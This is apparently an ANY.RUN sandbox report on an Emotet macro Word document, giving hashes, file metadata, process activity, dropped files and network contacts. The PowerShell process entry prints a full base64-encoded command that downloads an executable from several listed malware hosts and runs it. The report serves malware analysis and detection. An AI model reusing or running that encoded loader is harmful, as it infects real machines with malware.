analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

qwswz4-9sir7-jxlh

Full analysis: https://app.any.run/tasks/95692cf7-91be-4290-8481-9f3973c48f29
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: May 20, 2019, 13:48:19
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
opendir
emotet-doc
emotet
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Clothing methodologies microchip, Subject: Handmade Wooden Bike, Author: Margaret Willms, Comments: unleash, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri May 17 06:55:00 2019, Last Saved Time/Date: Fri May 17 06:55:00 2019, Number of Pages: 1, Number of Words: 29, Number of Characters: 170, Security: 0
MD5:

72149D1A57493FB31E99ED26BFE495F6

SHA1:

F5B202B43361CF877FD7B5401F26C76CF418FD3B

SHA256:

26B0B2660BE3E246F487A7F824EFB63F296D6221AEAE5FB5C661ADC82C78DFAE

SSDEEP:

3072:M77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8q4iZEA9tzzpujpOoSc:M77HUUUUUUUUUUUUUUUUUUUT52Vx+EAS

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    No malicious indicators.

  • SUSPICIOUS

    • PowerShell script executed

      • PowErsHell.exe (PID: 3204)

    • Executed via WMI

      • PowErsHell.exe (PID: 3204)

    • Creates files in the user directory

      • PowErsHell.exe (PID: 3204)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3376)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3376)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
Title: Clothing methodologies microchip
Subject: Handmade Wooden Bike
Author: Margaret Willms
Keywords: -
Comments: unleash
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:05:17 05:55:00
ModifyDate: 2019:05:17 05:55:00
Pages: 1
Words: 29
Characters: 170
Security: None
CodePage: Windows Latin 1 (Western European)
Company: Franecki, Green and Waters
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 198
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
Manager: Hermiston
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
35
Monitored processes
2
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
3376"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\qwswz4-9sir7-jxlh.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
3204PowErsHell -enC JABjADMANwA1ADcAXwA2ADQAPQAnAGoANQA4ADcANwA1ACcAOwAkAGEAOAAyADkAOAA1ADYAMgAgAD0AIAAnADEAMgAyACcAOwAkAHAAOQAxADkAOAAxADkANgA9ACcAaQAxADkAXwBfADcAMgAnADsAJABZADIANwBfADYANQBfAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABhADgAMgA5ADgANQA2ADIAKwAnAC4AZQB4AGUAJwA7ACQARQAxAF8AMQA0ADgAMgA9ACcAYgAzADMANAA2ADMAMAAyACcAOwAkAG0ANwBfADcAOABfADAAPQAuACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAJwArACcAYwB0ACcAKQAgAG4AZQBgAFQALgB3AGAAZQBgAEIAYwBMAGkARQBOAFQAOwAkAHMANAAyAF8AOAA2ADcAPQAnAGgAdAB0AHAAOgAvAC8AYwBsAGEAcwBzAGkAYwBpAG0AYQBnAGUAcgB5AC4AYwBvAG0ALwBiAHUAcwBpAG4AZQBzAHMALwBpAEEARwBLAGIAeABmAHMAawAvAEAAaAB0AHQAcAA6AC8ALwBlAGQAYQBuAGQAdAByAGkAcwBoAC4AYwBvAG0ALwBiAGwAdQBlAC8AOAB3AHMAZQBfAHoAcgBkAG4AeAAyAGMALQA5ADcANwA1AC8AQABoAHQAdABwADoALwAvAGYAaQBuAGUAdAByAGEAZABlAC4AagBwAC8AZABhAHQAYQAvAG0ARgBhAHAAUgByAE4ARwBFAC8AQABoAHQAdABwADoALwAvAG0AZQBlAG4AYQBrAHMAaABpAG0AYQB0AHIAaQBjAGgAcwBzAC4AZQBkAHUALgBpAG4ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwB6AFIAdQBuAHMARwBjAGwAcwAvAEAAaAB0AHQAcAA6AC8ALwB0AGEAbgBpAGIAaQBzAG4AaQBzAC4AdwBlAGIALgBpAGQALwB3AHAALwB4AGEAOQBvAF8AOAA4AHAAagA1AG0AYwByAC0AMgA2AC8AJwAuAFMAUABMAGkAVAAoACcAQAAnACkAOwAkAHcANQA5ADUANwA4ADAAPQAnAFgAOQAxADYANwA2ADAAXwAnADsAZgBvAHIAZQBhAGMAaAAoACQAbAAzADEANgAwADcAXwAgAGkAbgAgACQAcwA0ADIAXwA4ADYANwApAHsAdAByAHkAewAkAG0ANwBfADcAOABfADAALgBEAE8AVwBOAGwATwBBAEQAZgBpAEwARQAoACQAbAAzADEANgAwADcAXwAsACAAJABZADIANwBfADYANQBfACkAOwAkAGkAMgA2ADAAOQBfADgANAA9ACcAYQAxADkAMQA4ADAAMwAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0ASQAnACsAJwB0ACcAKwAnAGUAbQAnACkAIAAkAFkAMgA3AF8ANgA1AF8AKQAuAEwARQBOAEcAdABIACAALQBnAGUAIAAyADYANAA0ADEAKQAgAHsALgAoACcASQBuAHYAbwAnACsAJwBrAGUALQBJACcAKwAnAHQAZQAnACsAJwBtACcAKQAgACQAWQAyADcAXwA2ADUAXwA7ACQAVQA2ADYAMgA4ADMAPQAnAGsAOQA4ADQAMQA2ADAAMwAnADsAYgByAGUAYQBrADsAJAB6ADYAXwA0ADYANwA1AD0AJwB3ADkAOAAzADcANAA2ADQAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAVAAzADcANQBfADgANwA9ACcAQwA0ADIANQA1ADgAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\PowErsHell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
Total events
1 343
Read events
880
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
15

Dropped files

PID
Process
Filename
Type
3376WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRED99.tmp.cvr
MD5:
SHA256:
3204PowErsHell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VXZZVTIVMELS5QI0AJ0N.temp
MD5:
SHA256:
3376WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$swz4-9sir7-jxlh.docpgc
MD5:64D75435DB0D6ECBF71DB58CE64F3149
SHA256:6A2F2F67B7385024A2923596CCA5492F8A761DDB85AD71FBB3FC2BCD8FAE3138
3376WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:59B915F43B43901FA79C60151EA8042C
SHA256:836805470EEA2E00AAEE4008E313688C272B90045958CE36BDA26A66D9A0F169
3376WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F62E731C.wmfwmf
MD5:216C74D71CB4F4B1D41724F0EF9FC72B
SHA256:583C4159E78B33E56D57082BE73658872F0DBC445CAD164F3CAB742231F793F4
3376WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:BE3B51A2FFA431A7F2A35ED1AFE23D34
SHA256:A72D859171741D1660B2A8C61D47B966A8707778B092CD9704EC2423365C351C
3376WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3FF5006D.wmfwmf
MD5:1012A21156DCFF2937353BEE5985FADC
SHA256:A9F5E85E96612733BB239D8B221DEF29EFFC0E143359BB1A74882EEA75B8B601
3376WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FF602F5E.wmfwmf
MD5:18177A2722B8E33F76C08B6DF450BA4F
SHA256:2A1DD05E8314D744E261661834271ADDF8E08BCEDF3B57E4D93F2063D14B880C
3204PowErsHell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:131DC75F6D4142CA9244945A91A71E8D
SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4
3376WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D928C476.wmfwmf
MD5:1CBF535FEBA120E606E9565F8294C672
SHA256:60D2DC4F97BBB184D9228D01C36A3D21DD0EFC632FD0F4AB80D1D30CBCA64B88
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3204
PowErsHell.exe
GET
69.41.190.91:80
http://edandtrish.com/blue/8wse_zrdnx2c-9775/
US
suspicious
3204
PowErsHell.exe
GET
404
50.31.162.218:80
http://classicimagery.com/business/iAGKbxfsk/
US
text
9 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3204
PowErsHell.exe
69.41.190.91:80
edandtrish.com
WZ Communications Inc.
US
suspicious
50.31.162.218:80
classicimagery.com
Server Central Network
US
suspicious

DNS requests

Domain
IP
Reputation
classicimagery.com
  • 50.31.162.218
malicious
edandtrish.com
  • 69.41.190.91
suspicious

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
qwswz4-9sir7-jxlh